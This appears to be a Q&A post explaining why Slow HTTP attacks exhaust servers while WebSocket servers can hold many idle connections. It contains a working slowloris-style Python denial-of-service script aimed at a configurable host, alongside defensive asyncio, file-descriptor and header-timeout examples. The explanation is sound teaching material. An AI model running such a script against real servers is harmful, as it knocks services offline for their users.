Slow HTTP vs Web Sockets - Resource utilization

If a bunch of "Slow HTTP" connections to a server can consume enough resources to cause a denial of service, why wouldn't a bunch of WebSocket connections to a server cause the same problem?

The accepted answer to a different SO question says that it is almost free to maintain an idle connection.

If it costs nothing to maintain an open TCP connection, why does a "Slow HTTP" attack cause a denial of service?

A WebSocket and a "slow" HTTP connection both use an open connection. The difference lies in the expectations built into the server's design.

Typical HTTP servers do not need to handle a large number of open connections and are designed around the assumption that the number of open connections is small. If the server does not protect against slow clients, an attacker can force a server built on that assumption to hit a resource limit.
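
To make the "slow client" mechanism concrete, here is a minimal slowloris-style sketch in Python. The target host, port, and connection count are hypothetical values for a server you control and are authorized to test. Each socket sends a valid request line but never the blank line that terminates the headers, so the server must keep every connection, and whatever thread or buffer it allocated for it, alive indefinitely:

    import socket
    import time

    TARGET_HOST = "127.0.0.1"   # hypothetical test server you control
    TARGET_PORT = 8080
    NUM_CONNECTIONS = 200

    # Open many connections; each sends a valid request line and Host
    # header but never the blank line that ends the header block.
    conns = []
    for _ in range(NUM_CONNECTIONS):
        s = socket.create_connection((TARGET_HOST, TARGET_PORT))
        s.sendall(b"GET / HTTP/1.1\r\nHost: test\r\n")
        conns.append(s)

    # Periodically dribble one more bogus header on every socket so the
    # server keeps waiting for the request to finish.
    tick = 0
    while True:
        tick += 1
        for s in conns:
            s.sendall(f"X-keepalive-{tick}: 1\r\n".encode())
        time.sleep(10)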

Here are a couple of examples showing how the different expectations can impact the design:

  • If you only have a few HTTP requests in flight at a time, then it's OK to use a thread per connection. This is not a good design for a WebSocket server.

  • The default file descriptor limits are often adequate for typical HTTP scenarios, but not for a large number of connections (see the sketch after this list).
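
As a contrast to thread-per-connection, here is a minimal sketch of the event-driven alternative using Python's asyncio; the language, port number, and echo behaviour are my illustrative choices, not something from the original answer. Each idle connection costs roughly one parked coroutine and one file descriptor rather than an OS thread, and the process raises its own descriptor limit at startup (resource.setrlimit is Unix-only):

    import asyncio
    import resource  # Unix-only

    async def handle(reader: asyncio.StreamReader,
                     writer: asyncio.StreamWriter) -> None:
        # Echo lines back; an idle connection just parks this coroutine.
        while line := await reader.readline():
            writer.write(line)
            await writer.drain()
        writer.close()
        await writer.wait_closed()

    async def main() -> None:
        # Raise the soft file-descriptor limit to the hard limit so the
        # common default of 1024 does not cap the connection count.
        soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
        resource.setrlimit(resource.RLIMIT_NOFILE, (hard, hard))

        server = await asyncio.start_server(handle, "0.0.0.0", 8765)
        async with server:
            await server.serve_forever()

    asyncio.run(main())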

It is possible to design an HTTP server to handle a large number of open connections, and several servers do so out of the box.
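
One common protection is to bound how long a client may take to deliver its request. Here is a minimal sketch of that idea, reusing the asyncio style above; HEADER_TIMEOUT is an arbitrary illustrative value, and real servers expose the equivalent as configuration:

    import asyncio

    HEADER_TIMEOUT = 10.0  # seconds allowed for the full request head

    async def handle(reader: asyncio.StreamReader,
                     writer: asyncio.StreamWriter) -> None:
        try:
            # readuntil() waits for the blank line ending the headers;
            # wait_for() drops clients that trickle bytes to stall us.
            head = await asyncio.wait_for(
                reader.readuntil(b"\r\n\r\n"), timeout=HEADER_TIMEOUT
            )
        except (asyncio.TimeoutError, asyncio.IncompleteReadError):
            writer.close()  # slow or broken client: free its resources
            await writer.wait_closed()
            return
        writer.write(b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\n\r\nok")
        await writer.drain()
        writer.close()
        await writer.wait_closed()

    # Plug into the same kind of server as before:
    # server = await asyncio.start_server(handle, "0.0.0.0", 8765)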
